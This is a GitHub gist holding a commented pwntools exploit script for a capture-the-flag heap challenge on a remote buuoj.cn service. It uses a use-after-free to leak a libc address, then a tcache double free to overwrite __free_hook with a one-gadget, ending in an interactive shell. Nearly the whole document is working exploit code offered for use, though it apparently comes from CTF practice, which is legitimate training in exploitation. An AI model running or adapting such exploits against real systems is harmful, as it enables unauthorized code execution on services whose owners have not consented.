@Mech0n
Created August 16, 2020 11:39
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *
# Target is amd64 Linux; log_level='debug' makes pwntools print every byte
# exchanged, which is what you want while working a remote service blind.
context.update(arch='amd64', os='linux', log_level='debug')
# gdb sessions opened by debug() go into a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
# A local binary can be driven instead of the remote service:
# p = process('./pwn')
p = remote('node3.buuoj.cn', 25688)
def debug(p, cmd):
    """Attach gdb to the tube `p` with gdb script `cmd`, then block.

    `p` here shadows the module-level tube on purpose so the helper can be
    pointed at a local process() instead. pause() keeps the script from
    sending further input until the operator continues.
    """
    gdb.attach(p, cmd)
    pause()
def menu(idx):
    """Answer the target's 'choice:' prompt with menu entry `idx`."""
    choice = str(idx)
    p.sendlineafter('choice:', choice)
def add(size, name, phone):
    """Menu option 1: create a record whose name buffer is `size` bytes.

    The three prompts are answered in the order the target asks for them.
    `name` and `phone` are sent verbatim, so callers may pass raw bytes
    (the exploit passes packed pointers as the name).
    """
    menu(1)
    prompts = (
        ("Please input the size of compary's name", str(size)),
        ("please input name:", name),
        ('please input compary call:', phone),
    )
    for prompt, answer in prompts:
        p.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 3: free the record in slot `idx`."""
    menu(3)
    slot = str(idx)
    p.sendlineafter('Please input the index:', slot)
def show(idx):
    """Menu option 2: ask the target to print the record in slot `idx`.

    Only sends the request; the caller reads whatever comes back from `p`.
    """
    menu(2)
    slot = str(idx)
    p.sendlineafter('Please input the index:', slot)
def exploit():
    """Drive the remote target from a use-after-free and a double free to a shell.

    Steps, as the calls below show: leak a libc pointer by printing a freed
    large chunk, free one small chunk twice to loop it in the tcache, then
    use that loop to have `free_hook` handed back as an allocation and write
    `og` into it, so the next free() transfers control there.

    The three libc offsets are the author's hard-coded values for the
    target's libc build; they are not derived here and are wrong for any
    other build. The double free itself only works on a glibc without the
    tcache double-free check (added in 2.29), and the hook overwrite needs
    a glibc that still has __free_hook (removed in 2.34). This is also a
    Python 2 script: recvuntil() returns str and is ljust-padded with a str.
    """
    # Slot 0 is far larger than the tcache range (0x420); slots 1 and 2 are
    # same-size small chunks, which is what the double free below needs.
    add(0x420, 'mech0n', 'mech0n')  # idx 0
    add(0x20, 'mech0n', 'mech0n')  # idx 1
    add(0x20, 'mech0n', 'mech0n')  # idx 2
    delete(0)
    # debug(p, 'b *$rebase(0x146D)\n')
    # show() on a freed slot still prints it, so the target keeps the
    # pointer after free. The bytes up to the first '\x7f' are treated as
    # a libc pointer the allocator left in the freed chunk.
    show(0)
    # Author's constants: 96 and 0x3ebc40 are presumably the unsorted-bin
    # head offset within main_arena and main_arena's offset from libc base
    # for this build -- verify against the actual libc before reuse.
    libc = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 96 - 0x3ebc40  # 0x3ebc40
    success("LIBC: " + str(hex(libc)))
    pause()
    free_hook = libc + 0x00000000003ed8e8  # presumably __free_hook for this build
    og = libc + 0x4f322  # one-shot gadget offset; author's other candidates: 0x4f3c2, 0x10a45c, 0x4f365
    # Double free: slot 1 is freed twice with no allocation in between, so
    # the same chunk sits in the tcache bin twice.
    delete(1)
    # debug(p, 'b *$rebase(0x1577)\n')
    delete(1)
    # First reuse of the chunk: its name buffer now starts with free_hook,
    # which is where the freed chunk's next-pointer lives, so the bin's
    # second copy now leads to free_hook.
    add(0x20, p64(free_hook), 'mech0n')
    # debug(p, 'b *$rebase(0x136E)\n')
    # Consume the chunk's remaining tcache entry.
    add(0x20, 'mech0n', 'mech0n')
    # This allocation is served at free_hook; its name writes og there.
    add(0x20, p64(og), 'mech0n')
    # Any free() now goes through the overwritten hook.
    delete(2)
    p.interactive()
if __name__ == '__main__':
    # Only fire the sequence when run as a script; importing the module
    # still opens the remote connection at load time (see `p` above).
    exploit()
Mech0n commented Aug 16, 2020

Tcache Double Free
